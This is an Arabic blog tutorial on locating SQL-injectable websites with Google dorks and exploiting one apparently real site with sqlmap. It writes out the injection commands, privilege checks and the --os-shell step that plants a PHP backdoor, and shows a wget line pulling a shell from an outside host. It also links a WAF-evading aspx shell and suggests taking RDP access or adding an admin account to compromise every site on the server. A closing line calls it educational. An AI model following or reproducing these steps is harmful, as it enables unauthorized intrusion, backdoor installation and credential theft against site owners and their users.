معرفة المواقع المصابة بثغرة sql بإستعمال برنامج حقن المواقع

3
معرفة المواقع المصابة بثغرة sql
معرفة المواقع المصابة بثغرة sql



شرح كيفية معرفة المواقع المصابة بثغرة sql و رفع الشل 


في الكثير من الاحيان نقوم ب استغلال ثغرة الحقن sql على الكثير من المواقع و دائما ما يواجه المبتدئون صعوبة في ايجاد لوحة التحكم او حتى ان وجدها فانه ربما لا يعرف كيف يتخطى الحماية و يقوم ب رفع ملف ضار شل (PHP) مثلا او ASP او ايا كان 
لهادا ساقدم لكم اليوم الشرح المفصل لرفع الشل مباشرة من ادات SQLMAP طبعا ليس شرطا ب ادات SQLAMP تستطيع ان تقوم بها عبر الطريقة اليدوية  في حال وجود حماية مثلا WFA 
الان سوف نمر الى شرحنا 

في البداية اريد ان اقدم لكم مجموعة من الدوركات للبحث على مواقع مصابة المواقع المصابة بهده الثغرة في الاغلب تكون على سيرفرات الوندوز  لهادا انصحكم ب البحث بهده الدوركات لانني انا شخصيا وجدت الكثير من المواقع المصابة بهده الثغرة 

و هده قائمة ب اكثر من 4000 دورك للبحث على الثغرة 

رابط الدوركات اضغط هنا 

وهده قائمة اخرى من دوركات للبحث على مواقع مصابة و لكن مبرمجة بلغة asp و انشاء الله مضمونة 

رابط الدوركات اضغط هنا 

و الان بعد ان وجدنا احد المواقع المصابة ب الثغرة  سوف نشرح كيف تتم عملية الحقن  
الاصابة 

http://www.lzyts.com/routes/tours.php?s=1016

الان سوف ننفد هدهالاوامر على هادا الموقع عير ادات sqlmap  

الامر الاول   

sqlmap -u ‘http://www.lzyts.com/routes/tours.php?s=1016’ –batch


و هادا الامر لحقن الموقع مع تخطي جميع الخيارات (الحقن السريع

و الان بعد الانتهاء من الحقن اعطى لنا هده النتائج كما نشاهد في الصورة 

معرفة المواقع المصابة بثغرة sql بإستعمال برنامج حقن المواقع




سوف نقوم الان هده المعلومات  هده المعلومات


web server operating system: Windows 2008 R2 or  7  <<1 font=””>

نضام التشغيل وندوز 2008 r2 او وندوز 7 (لم تستطع الادات تحديد نضام التشغيل ب كفائة )
و يمكن معرفة نضام التشغيل عبر ادات nmap التي سبق و شرحتها 

للمرور الى الشرح اضغط هنا  

2 >> web application technology: Microsoft IIS 7.5, PHP 5.5.15, ASP.NET

لغات البرمجة المستخدمة في السيرفر   Microsoft IIS 7.5 و PHP 5.5.15 و  ASP.NET



3 >> back-end DBMS: MySQL 5


نوع قاعدة البيانات MySQL الاصدار


و الان سوف نقوم بتنفيد هادا الامر 

sqlmap -u ‘http://www.lzyts.com/routes/tours.php?s=1016’ –current-user –is-dba

لمعرفة الصلحيات على السيرفر 

الان سوف نرى في الصورة ما هي صلحياتنا 




كما نرى في الصورة ف انا صلاحياتنا في السيرفر هي ROOT  و من هنا يمكننا التحكم في جميع قواعد البينات التي في السيرفر

لم تفهم !! 
على سبيل المثال يوجد في السيرفر  10 مواقع و لكل موقع قاعدة بينات و من هنا يمكننا الدخول لاي قاعدة بينات لاي موقع نريد  🙂 

الان اعتقد انك فهمت 

الان كيف سوف نرفع شل على الموقع 

الامر 

 sqlmap -u ‘http://www.lzyts.com/routes/tours.php?s=1016’ –os-shell

نتيجة الامر كما نشاهد في الصورة 

معرفة المواقع المصابة بثغرة sql بإستعمال برنامج حقن المواقع




و الان عليك ان تختار بعناية ادا كان السيرفر يدعم لغة php ف عليك ان تختار php  و ان كان يدعم asp اخترها الخ 


بعد ما اخترت انا php لان السيرفر يدعم لغة PHP ضهرت لي هده النتيجة 



هنا الادات تريد منا تحديد مكان رفع الشل  

[1] common location(s) (‘C:/xampp/htdocs/, C:/Inetpub/wwwroot/’) (default)
رفع الشل في  المسار الدي تختاره الادات 
[2] custom location(s)
المسار الدي تختاره انت 

[3] custom directory list file

قائمة للتخمين على مسار في السيرفر و رفع الشل فيه على شرط وجودصلحيات 
 
[4] brute force search
 
القيام بعملية تخمين  على المسار ب المسارات الموجودة في الادات مسبقا فيه تحتوي على الكثير من المسارات للتخمين 
 
انا شخصيا جربت كل شيء و لم انجح و كنت سوف اترك السيرفر و لكن وردتني فكرة انا السيرفر الدي اخترقته كان سيرفر وندوز 
 
وسيرفرات الوندوز تعطيك احد الاخطاء  بدل INDEX OF 
 
على سبيل المثال لو دخلنا الى هادا المسار لنرى ما هو الخطء الدي اتكلم عليه 
 

http://www.lzyts.com/images/

 
هدا هو الخطء الدي ضهر معي 
 
معرفة المواقع المصابة بثغرة sql بإستعمال برنامج حقن المواقع
 


كما نلاحض في الصفحة مسارنا في السيرفر 

D:wwwlzytsimages

لهادا هده الثغرة سهلة الاستغلال في سيرفرات الوندوز اما في سيرفرات لينوكس سوف تواجه الكثير من المشاكل و لكن ان شاء الله في طرق للتخطي سوف اشرحها في هده المدونة المتواضعة  
الان نختار الخيار 2 في sqlmap 


و الان بعد انتهاء الحقن سوف نرى مع  بعض نتيجة الحقن في هده الصورة 


معرفة المواقع المصابة بثغرة sql بإستعمال برنامج حقن المواقع




كما نلاحض قد تم رفع مركز رفع مع هده الرسالة  مع رابطه 

the backdoor has been successfully uploaded on ‘/www/lzyts/images/’ – http://www.lzyts.com:80/images/tmpbjaml.php

اي ان الرفع قد تم و اعطى لنا جلسة شل  في السيرفر يمكن تطبيق اوامر الوندوز عليه مثلا لمعرفة ايبي السيرفر ننفد هادا الامر  ipconfig


تابع أيضا : أفضل برامج أمن المعلومات (الهكر) على الإطلاق 
  
و الان يمكنا التنقل في السيرفر  و رفع الشل الخاص بنا عبر الامر 


wget http://www.site.com/shell.txt -o shell.php


و الان ندخل الى مسار مركز الرفع 

 http://www.lzyts.com:80/images/tmpbjaml.php

معرفة المواقع المصابة بثغرة sql بإستعمال برنامج حقن المواقع




كما نرى قد تم رفع مركز رفع و الان سوف نقوم ب رفع شل aspx 
و لكن ليس اي شل بل شل يتخطى الحمايات 
و يمكنك تحميله عبر هادا الرابط  

http://cut-urls.com/mGbEZ


و الان كما نلاحض في هده الصورة بعد رفع الشل 





و الان يمكننا سحب rdp و اختراق جميع المواقع التي في نفس السيرفر عبر اضافة ادمن جديد في السيرفر او سحب اليوزر و الباس الخاصة ب الادمن في هادا السيرفر 


في النهاية هادا الشرح تعليمي ليس الا و اتمنى ان نكون في حسن نيتكم ولا تنسو دعم هده المدونة 



3 Comments
  1. Sajaad Gamer says

    Very Good

  2. Mr.Virus-Dz Hacker says

    شكراااااا جزالا لك بارك الله فيك

  3. Kader Saada says

    انت عبقرى

Leave A Reply

Your email address will not be published.